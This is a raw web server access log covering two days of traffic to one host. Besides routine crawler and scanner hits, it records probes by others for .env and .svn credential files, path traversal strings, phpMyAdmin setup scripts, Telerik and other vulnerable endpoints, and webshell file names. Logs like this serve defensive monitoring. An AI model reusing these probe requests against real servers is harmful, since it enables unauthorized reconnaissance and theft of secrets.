192.241.197.13 - - [30/Dec/2023:05:35:01 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

43.163.9.31 - - [30/Dec/2023:05:48:51 -0600] "GET /.svn/wc.db HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0"

83.97.73.87 - - [30/Dec/2023:06:07:36 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

24.250.168.93 - - [30/Dec/2023:06:18:58 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

94.156.71.92 - - [30/Dec/2023:07:45:21 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

45.142.182.76 - - [30/Dec/2023:08:44:48 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

64.227.9.111 - - [30/Dec/2023:09:02:10 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

91.92.243.232 - - [30/Dec/2023:10:51:18 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [30/Dec/2023:10:51:27 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

2.57.122.213 - - [30/Dec/2023:12:04:22 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 2.57.122.213 - - [30/Dec/2023:12:04:22 -0600] "POST / HTTP/1.1" 200 296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

185.150.26.205 - - [30/Dec/2023:12:10:08 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

198.244.213.98 - - [30/Dec/2023:13:43:22 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36"

138.68.47.220 - - [30/Dec/2023:13:43:56 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

107.170.239.40 - - [30/Dec/2023:14:13:13 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

138.68.63.240 - - [30/Dec/2023:14:17:24 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

80.41.130.107 - - [30/Dec/2023:14:21:45 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

205.210.31.134 - - [30/Dec/2023:15:33:17 -0600] "\x16\x03\x01" 400 0 "-" "-" 205.210.31.134 - - [30/Dec/2023:15:33:17 -0600] "\x16\x03\x01" 400 0 "-" "-"

94.156.71.92 - - [30/Dec/2023:16:34:39 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

176.97.210.229 - - [30/Dec/2023:16:54:29 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

62.146.226.100 - - [30/Dec/2023:17:06:17 -0600] "GET /.env HTTP/1.1" 404 491 "-" "python-requests/2.31.0"

198.235.24.173 - - [30/Dec/2023:17:21:27 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

78.153.140.219 - - [30/Dec/2023:17:52:30 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

78.153.140.219 - - [30/Dec/2023:17:52:30 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

194.187.176.83 - - [30/Dec/2023:18:26:48 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"

194.187.176.152 - - [30/Dec/2023:18:26:48 -0600] "GET /favicon.ico HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"

176.97.210.231 - - [30/Dec/2023:18:50:53 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

141.98.11.60 - - [30/Dec/2023:19:02:06 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

45.142.182.76 - - [30/Dec/2023:19:06:44 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

118.26.39.162 - - [30/Dec/2023:19:38:51 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

34.140.248.32 - - [30/Dec/2023:19:46:43 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

167.94.146.56 - - [30/Dec/2023:19:50:10 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.146.56 - - [30/Dec/2023:19:50:14 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.146.56 - - [30/Dec/2023:19:50:14 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.146.56 - - [30/Dec/2023:19:50:14 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

141.98.11.60 - - [30/Dec/2023:20:05:30 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

172.104.11.34 - - [30/Dec/2023:20:21:28 -0600] "\x16\x03\x01" 400 0 "-" "-"

35.203.210.149 - - [30/Dec/2023:21:03:53 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

159.203.224.22 - - [30/Dec/2023:21:16:18 -0600] "GET /manager/html HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

5.58.195.150 - - [30/Dec/2023:23:35:38 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

December 31, 2023

165.154.172.111 - - [31/Dec/2023:00:27:27 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 8_2_2; Win64; x64) AppleWebKit/556.55 (KHTML, like Gecko) Chrome/64.0.2483 Safari/537.36" 165.154.172.111 - - [31/Dec/2023:00:27:28 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 9_1_2; Win64; x64) AppleWebKit/558.47 (KHTML, like Gecko) Chrome/70.0.47 Safari/537.36" 165.154.172.111 - - [31/Dec/2023:00:27:28 -0600] "GET /sitemap.xml HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_2_2) AppleWebKit/582.35 (KHTML, like Gecko) Chrome/78.0.887 Safari/537.36" 165.154.172.111 - - [31/Dec/2023:00:27:28 -0600] "GET /robots.txt HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 9_0; Win64; x64) AppleWebKit/600.42 (KHTML, like Gecko) Chrome/99.0.965 Safari/537.36" 165.154.172.111 - - [31/Dec/2023:00:27:28 -0600] "GET /axis2-admin/ HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 165.154.172.111 - - [31/Dec/2023:00:27:28 -0600] "GET /axis2/ HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 165.154.172.111 - - [31/Dec/2023:00:27:28 -0600] "GET /axis2/axis2-admin/ HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"

212.83.189.163 - - [31/Dec/2023:00:33:54 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 212.83.189.163 - - [31/Dec/2023:00:33:54 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 212.83.189.163 - - [31/Dec/2023:00:34:06 -0600] "GET /HNAP1 HTTP/1.1" 404 454 "http://67.218.15.25:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 212.83.189.163 - - [31/Dec/2023:00:34:07 -0600] "POST /onvif/device_service HTTP/1.1" 404 454 "http://67.218.15.25:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 212.83.189.163 - - [31/Dec/2023:00:34:09 -0600] "GET /PSIA/index HTTP/1.1" 404 454 "http://67.218.15.25:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

91.92.243.232 - - [31/Dec/2023:00:37:13 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [31/Dec/2023:00:37:20 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

45.142.182.92 - - [31/Dec/2023:03:31:40 -0600] "CONNECT res.wx.qq.com:443 HTTP/1.1" 405 504 "-" "Go-http-client/1.1"

68.183.32.204 - - [31/Dec/2023:04:30:31 -0600] "\x16\x03\x01" 400 0 "-" "-" 68.183.32.204 - - [31/Dec/2023:04:30:36 -0600] "\x16\x03\x01" 400 0 "-" "-" 68.183.32.204 - - [31/Dec/2023:04:30:42 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.32.204 - - [31/Dec/2023:04:30:49 -0600] "GET /form.html HTTP/1.1" 404 435 "-" "curl/8.1.2" 68.183.32.204 - - [31/Dec/2023:04:30:49 -0600] "GET /upl.php HTTP/1.1" 404 435 "-" "Mozilla/5.0" 68.183.32.204 - - [31/Dec/2023:04:30:49 -0600] "\x16\x03\x01" 400 0 "-" "-" 68.183.32.204 - - [31/Dec/2023:04:30:49 -0600] "GET /geoip/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.32.204 - - [31/Dec/2023:04:30:50 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.32.204 - - [31/Dec/2023:04:30:50 -0600] "GET /1.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.32.204 - - [31/Dec/2023:04:30:50 -0600] "GET /bundle.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.32.204 - - [31/Dec/2023:04:30:50 -0600] "GET /files/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.32.204 - - [31/Dec/2023:04:30:51 -0600] "GET /systembc/password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.32.204 - - [31/Dec/2023:04:30:51 -0600] "GET /password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.183.32.204 - - [31/Dec/2023:04:30:51 -0600] "GET /info.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

167.248.133.52 - - [31/Dec/2023:05:00:24 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.248.133.52 - - [31/Dec/2023:05:00:27 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.52 - - [31/Dec/2023:05:00:27 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.248.133.52 - - [31/Dec/2023:05:00:27 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

185.224.128.191 - - [31/Dec/2023:05:09:49 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

91.92.243.232 - - [31/Dec/2023:05:21:21 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [31/Dec/2023:05:21:24 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

74.82.47.4 - - [31/Dec/2023:05:40:30 -0600] "\x16\x03\x01" 400 0 "-" "-"

165.154.164.114 - - [31/Dec/2023:05:55:42 -0600] "\x16\x03\x01\x01\x17\x01" 400 0 "-" "-" 165.154.164.114 - - [31/Dec/2023:05:55:56 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 165.154.164.114 - - [31/Dec/2023:05:56:02 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 165.154.164.114 - - [31/Dec/2023:05:56:04 -0600] "GET /robots.txt HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 165.154.164.114 - - [31/Dec/2023:05:56:05 -0600] "GET /sitemap.xml HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"

74.82.47.5 - - [31/Dec/2023:06:33:09 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36" 74.82.47.5 - - [31/Dec/2023:06:35:48 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 74.82.47.5 - - [31/Dec/2023:06:36:56 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"

80.66.88.204 - - [31/Dec/2023:06:56:28 -0600] "\x03" 400 0 "-" "-"

178.205.46.132 - - [31/Dec/2023:09:23:28 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

78.153.140.221 - - [31/Dec/2023:12:31:44 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.221 - - [31/Dec/2023:12:31:45 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

45.142.182.103 - - [31/Dec/2023:14:15:15 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

205.210.31.231 - - [31/Dec/2023:14:26:51 -0600] "\x16\x03\x01" 400 0 "-" "-" 205.210.31.231 - - [31/Dec/2023:14:26:51 -0600] "\x16\x03\x01" 400 0 "-" "-"

42.192.53.183 - - [31/Dec/2023:14:46:20 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:21 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:21 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:22 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:22 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:33 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:34 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:34 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:35 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:35 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:36 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:36 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:42 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:42 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:43 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:43 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:44 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:44 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:45 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:45 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:46 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:46 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:47 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:47 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:48 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:48 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:49 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:49 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:55 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:46:56 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:47:01 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:47:02 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:47:02 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:47:08 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:47:08 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:47:09 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [31/Dec/2023:14:47:09 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

205.210.31.65 - - [31/Dec/2023:14:51:42 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

185.180.143.141 - - [31/Dec/2023:15:20:40 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:20:56 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:20:57 -0600] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:10 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:11 -0600] "GET /favicon.ico HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:11 -0600] "GET /webfig/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:23 -0600] "GET /api/session/properties HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:34 -0600] "GET /solr/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:45 -0600] "HEAD /icons/sphere1.png HTTP/1.1" 200 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:45 -0600] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 161 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:45 -0600] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 161 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:46 -0600] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 161 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:46 -0600] "GET /static/historypage.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:21:57 -0600] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:22:05 -0600] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:22:15 -0600] "GET /showLogin.cc HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:22:27 -0600] "GET /index.jsp HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:22:37 -0600] "GET /favicon-32x32.png HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.141 - - [31/Dec/2023:15:22:37 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 